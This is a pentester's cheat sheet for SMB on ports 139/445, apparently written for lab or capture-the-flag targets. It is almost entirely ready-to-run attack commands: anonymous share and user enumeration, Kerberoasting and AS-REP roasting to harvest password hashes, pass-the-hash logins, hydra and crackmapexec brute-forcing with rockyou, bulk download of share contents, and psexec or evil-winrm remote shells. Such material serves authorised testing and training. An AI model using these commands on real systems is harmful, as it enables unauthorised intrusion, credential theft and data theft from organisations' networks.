# Port 139/445 - SMB

# Methodology

With No Creds
    nbtscan {IP}
    smbmap -H {IP}
    smbmap -H {IP} -u null -p null
    smbclient -N -L //{IP}
    smbclient -N //{IP}/ --option="client min protocol"=LANMAN1
    rpcclient {IP}
    rpcclient -U "" {IP}
    crackmapexec smb {IP}
    crackmapexec smb {IP} --pass-pol -u "" -p ""
    GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all
    GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat
    GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/"
    getArch.py -target {IP}

With Creds
    smbmap -H {IP} -u {Username} -p {Password}
    smbclient -h "\\\\{IP}\\\" -U {Domain_Name} -W {Username} -l {IP}
    smbclient -h "\\\\{IP}\\\" -U {Domain_Name} -W {Username} -l {IP} --pw-nt-hash `hash`
    crackmapexec smb {IP} -u {Username} -p {Password} --shares
    GetADUsers.py {Domain_Name}/{Username}:{Password} -all
    GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
    GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request

# Enumerate All

enum4linux -a 10.10.10.x

# Check for vulnerabilities

ls /usr/share/nmap/scripts/ | grep smb | grep vuln
sudo nmap --script smb-vuln* -p 139,445 10.10.10.x
sudo nmap --script=smb-check-vulns.nse <targetip> -p445

# List Open Shares

smbclient -L 10.10.10.x
smbmap -H 10.10.10.x
smbmap -H 10.10.10.x -u anonymous
crackmapexec smb 10.10.10.x --shares -u '' -p ''

# List Files in share

smbmap -H 10.10.10.x -u anonymous -r --depth 5
smbmap -H -u s.smith -p myp4ss -r --depth 5

# Mount a share to browse locally

mount -t cifs //10.10.10.x/Backups /mnt/smb

# Connect to SMB share

smbclient //10.10.10.x/ -U
smbclient //10.10.10.x/[SHARE] -U ''

# Get password policy

crackmapexec smb 10.10.10.x --pass-pol

# Bruteforce SMB Login

crackmapexec smb -u users.txt -p /usr/share/wordlists/rockyou.txt
hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb

# Download all files from share

smbget -R smb://

# WinRM

crackmapexec winrm -u /home/kali/users.txt -p 'secretpassword'
# Got pwned? Use PSEXEC or WINRM to login!

sudo python2 psexec.py megacorp.org/bob:'secretpassword'@

# WinRM
evil-winrm -i -u bob -p 'secretpassword'